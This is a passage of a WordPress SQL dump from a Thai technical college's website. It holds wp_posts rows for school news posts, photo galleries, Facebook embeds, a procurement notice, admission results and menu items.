(697, 1, '2018-01-19 16:00:26', '2018-01-19 09:00:26', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D520408451668681%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'อาชีวะอาสา เทศกาลปีใหม่ 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%b0%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2-%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%81%e0%b8%b2%e0%b8%a5%e0%b8%9b%e0%b8%b5%e0%b9%83%e0%b8%ab', '', '', '2018-01-21 14:55:14', '2018-01-21 07:55:14', '', 0, 'http://www.technicrayong.ac.th/?p=697', 476, 'post', '', 0),
(698, 1, '2018-01-19 16:00:26', '2018-01-19 09:00:26', '<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D520408451668681%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowTransparency=\"true\"></iframe>', 'ย์อาชีวะอาสา เทศกาลปีใหม่ 2561', '', 'inherit', 'closed', 'closed', '', '697-revision-v1', '', '', '2018-01-19 16:00:26', '2018-01-19 09:00:26', '', 697, 'http://www.technicrayong.ac.th/697-revision-v1/', 0, 'revision', '', 0),
(700, 1, '2018-01-19 16:15:24', '2018-01-19 09:15:24', '<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D520408451668681%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowTransparency=\"true\"></iframe>', 'อาชีวะอาสา เทศกาลปีใหม่ 2561', '', 'inherit', 'closed', 'closed', '', '697-revision-v1', '', '', '2018-01-19 16:15:24', '2018-01-19 09:15:24', '', 697, 'http://www.technicrayong.ac.th/697-revision-v1/', 0, 'revision', '', 0),
(701, 1, '2018-01-19 16:18:50', '2018-01-19 09:18:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D530145487361644%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'นักเรียน ระดับชั้น ปวช.3 สาขาวิชาการตลาด วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ 2 ในการประกวดโครงการยุวชนประกันภัย ระดับจังหวัด', '', 'publish', 'closed', 'open', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b1%e0%b8%9a%e0%b8%8a%e0%b8%b1%e0%b9%89%e0%b8%99-%e0%b8%9b%e0%b8%a7%e0%b8%8a-3-%e0%b8%aa', '', '', '2018-01-21 14:55:34', '2018-01-21 07:55:34', '', 0, 'http://www.technicrayong.ac.th/?p=701', 474, 'post', '', 0),
(702, 1, '2018-01-19 16:18:50', '2018-01-19 09:18:50', '<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D530145487361644%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowTransparency=\"true\"></iframe>', 'นักเรียน ระดับชั้น ปวช.3 สาขาวิชาการตลาด วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ 2 ในการประกวดโครงการยุวชนประกันภัย ระดับจังหวัด', '', 'inherit', 'closed', 'closed', '', '701-revision-v1', '', '', '2018-01-19 16:18:50', '2018-01-19 09:18:50', '', 701, 'http://www.technicrayong.ac.th/701-revision-v1/', 0, 'revision', '', 0),
(703, 1, '2018-01-19 16:22:28', '2018-01-19 09:22:28', '', '25791071_520406348335558_7108726815089630828_o', '', 'inherit', 'closed', 'closed', '', '25791071_520406348335558_7108726815089630828_o', '', '', '2018-01-19 16:22:28', '2018-01-19 09:22:28', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/25791071_520406348335558_7108726815089630828_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(704, 1, '2018-01-19 16:22:30', '2018-01-19 09:22:30', '', '26733372_530144780695048_8363742773677278566_n', '', 'inherit', 'closed', 'closed', '', '26733372_530144780695048_8363742773677278566_n', '', '', '2018-01-19 16:22:30', '2018-01-19 09:22:30', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/26733372_530144780695048_8363742773677278566_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(705, 1, '2018-01-19 16:25:47', '2018-01-19 09:25:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D530145487361644%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"></span></iframe></p>', 'นักเรียน ระดับชั้น ปวช.3 สาขาวิชาการตลาด วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ 2 ในการประกวดโครงการยุวชนประกันภัย ระดับจังหวัด', '', 'inherit', 'closed', 'closed', '', '701-revision-v1', '', '', '2018-01-19 16:25:47', '2018-01-19 09:25:47', '', 701, 'http://www.technicrayong.ac.th/701-revision-v1/', 0, 'revision', '', 0),
(706, 1, '2018-01-19 16:26:19', '2018-01-19 09:26:19', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D520408451668681%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'อาชีวะอาสา เทศกาลปีใหม่ 2561', '', 'inherit', 'closed', 'closed', '', '697-revision-v1', '', '', '2018-01-19 16:26:19', '2018-01-19 09:26:19', '', 697, 'http://www.technicrayong.ac.th/697-revision-v1/', 0, 'revision', '', 0),
(710, 1, '2018-01-20 14:51:21', '2018-01-20 07:51:21', '', 'polylang_mo_21', '', 'private', 'closed', 'closed', '', 'polylang_mo_21', '', '', '2018-01-20 14:51:21', '2018-01-20 07:51:21', '', 0, 'http://www.technicrayong.ac.th/?post_type=polylang_mo&p=710', 0, 'polylang_mo', '', 0),
(711, 1, '2018-01-20 14:51:43', '2018-01-20 07:51:43', '', 'polylang_mo_24', '', 'private', 'closed', 'closed', '', 'polylang_mo_24', '', '', '2018-01-20 14:51:43', '2018-01-20 07:51:43', '', 0, 'http://www.technicrayong.ac.th/?post_type=polylang_mo&p=711', 0, 'polylang_mo', '', 0),
(714, 1, '2018-01-20 15:05:53', '2018-01-20 08:05:53', ' a', '', '', 'inherit', 'closed', 'closed', '', '160-revision-v1', '', '', '2018-01-20 15:05:53', '2018-01-20 08:05:53', '', 160, 'http://www.technicrayong.ac.th/160-revision-v1/', 0, 'revision', '', 0),
(715, 1, '2018-01-20 15:06:03', '2018-01-20 08:06:03', ' English', 'en', '', 'publish', 'closed', 'closed', '', 'en', '', '', '2018-01-21 15:44:18', '2018-01-21 08:44:18', '', 0, 'http://www.technicrayong.ac.th/?page_id=715', 0, 'page', '', 0),
(716, 1, '2018-01-20 15:06:03', '2018-01-20 08:06:03', 'a', '', '', 'inherit', 'closed', 'closed', '', '715-revision-v1', '', '', '2018-01-20 15:06:03', '2018-01-20 08:06:03', '', 715, 'http://www.technicrayong.ac.th/715-revision-v1/', 0, 'revision', '', 0),
(717, 1, '2018-01-20 15:07:00', '2018-01-20 08:07:00', ' ', '', '', 'inherit', 'closed', 'closed', '', '715-revision-v1', '', '', '2018-01-20 15:07:00', '2018-01-20 08:07:00', '', 715, 'http://www.technicrayong.ac.th/715-revision-v1/', 0, 'revision', '', 0),
(718, 1, '2018-01-20 15:11:40', '2018-01-20 08:11:40', '', 'Language switcher', '', 'publish', 'closed', 'closed', '', 'language-switcher', '', '', '2018-03-14 16:26:20', '2018-03-14 09:26:20', '', 0, 'http://www.technicrayong.ac.th/?p=718', 1, 'nav_menu_item', '', 0),
(719, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'หน้าแรก', '', 'publish', 'closed', 'closed', '', '%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2%e0%b9%81%e0%b8%a3%e0%b8%81', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=719', 1, 'nav_menu_item', '', 0),
(720, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', 'News', 'ข่าว', '', 'publish', 'closed', 'closed', '', '%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=720', 2, 'nav_menu_item', '', 0),
(721, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', 'Events', 'กิจกรรม', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=721', 3, 'nav_menu_item', '', 0),
(722, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'ฝ่ายวิชาการ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%8a%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=722', 4, 'nav_menu_item', '', 0),
(723, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'ฝ่ายแผนงาน ฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b8%af-2', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=723', 5, 'nav_menu_item', '', 0),
(724, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'ฝ่ายบริหารทรัพยากร', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%a3%e0%b8%b1%e0%b8%9e%e0%b8%a2%e0%b8%b2%e0%b8%81%e0%b8%a3-2', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=724', 6, 'nav_menu_item', '', 0),
(725, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'ฝ่ายพัฒนากิจการ ฯ', '', 'publish', 'closed', 'closed', '', '%e0%b8%9d%e0%b9%88%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%af-2', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=725', 7, 'nav_menu_item', '', 0),
(726, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'คณะผู้บริหาร', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3-2', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=726', 8, 'nav_menu_item', '', 0),
(727, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'สถานีอาร์เรดิโอ', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%b5%e0%b8%ad%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b9%80%e0%b8%a3%e0%b8%94%e0%b8%b4%e0%b9%82%e0%b8%ad', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=727', 9, 'nav_menu_item', '', 0),
(728, 1, '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 'เว็บเก่า', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%a7%e0%b9%87%e0%b8%9a%e0%b9%80%e0%b8%81%e0%b9%88%e0%b8%b2-2', '', '', '2018-01-20 15:22:18', '2018-01-20 08:22:18', '', 0, 'http://www.technicrayong.ac.th/?p=728', 10, 'nav_menu_item', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(730, 1, '2018-01-21 14:51:50', '2018-01-21 07:51:50', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\"', '\"เทคนิคระยองเกมส์\" ...', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-21 14:51:50', '2018-01-21 07:51:50', '', 320, 'http://www.technicrayong.ac.th/320-revision-v1/', 0, 'revision', '', 0),
(731, 1, '2018-01-21 14:52:17', '2018-01-21 07:52:17', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'การประเมินองค์การมาตรฐานดีเด่น', 'รอบสอง ...', 'inherit', 'closed', 'closed', '', '342-revision-v1', '', '', '2018-01-21 14:52:17', '2018-01-21 07:52:17', '', 342, 'http://www.technicrayong.ac.th/342-revision-v1/', 0, 'revision', '', 0),
(732, 1, '2018-01-21 14:52:42', '2018-01-21 07:52:42', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'ทำบุญตักบาตรข้าวสารอาหารแห้ง', 'เนื่องในโอกาสวันขึ้นปีใหม่ ...', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-21 14:52:42', '2018-01-21 07:52:42', '', 354, 'http://www.technicrayong.ac.th/354-revision-v1/', 0, 'revision', '', 0),
(740, 1, '2018-01-21 15:12:07', '2018-01-21 08:12:07', '<img class=\"aligncenter size-large wp-image-274\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ประกาศจัดทำคุณลักษณะครุภัณฑ์-ช่างยนต์-ปิโตร-ไฟฟ้า-2561-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศขอเชิญชวนร่วมจัดทำคุณลักษณะเฉพาะครุภัณฑ์การศึกษาสาขาวิชาช่างยนต์, ปิโตรเคมี, ไฟฟ้ากำลัง ประจำปีงบประมาณ 2561 จำนวน 4 รายการ', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%82%e0%b8%ad%e0%b9%80%e0%b8%8a%e0%b8%b4%e0%b8%8d%e0%b8%8a%e0%b8%a7%e0%b8%99%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%88%e0%b8%b1%e0%b8%94-2', '', '', '2018-03-27 08:55:53', '2018-03-27 01:55:53', '', 0, 'http://www.technicrayong.ac.th/?p=740', 497, 'post', '', 0),
(741, 1, '2018-01-21 15:12:07', '2018-01-21 08:12:07', '<img class=\"aligncenter size-large wp-image-274\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ประกาศจัดทำคุณลักษณะครุภัณฑ์-ช่างยนต์-ปิโตร-ไฟฟ้า-2561-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศขอเชิญชวนร่วมจัดทำคุณลักษณะเฉพาะครุภัณฑ์การศึกษาสาขาวิชาช่างยนต์, ปิโตรเคมี, ไฟฟ้ากำลัง ประจำปีงบประมาณ 2561 จำนวน 4 รายการ', '', 'inherit', 'closed', 'closed', '', '740-revision-v1', '', '', '2018-01-21 15:12:07', '2018-01-21 08:12:07', '', 740, 'http://www.technicrayong.ac.th/740-revision-v1/', 0, 'revision', '', 0),
(744, 1, '2018-01-21 15:15:54', '2018-01-21 08:15:54', '<h4><a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653\r\n</span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\">นักเรียน/นักศึกษาโควตา\r\nปีการศึกษา 2561.\r\nให้กรอกข้อมูลผ่านระบบออนไลน์. และพิมพ์ใบสมัครมาใช้ประกอบการมอบตัวตามวันเวลาที่กำหนด.\r\n</span></strong>\r\n\r\n \r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', 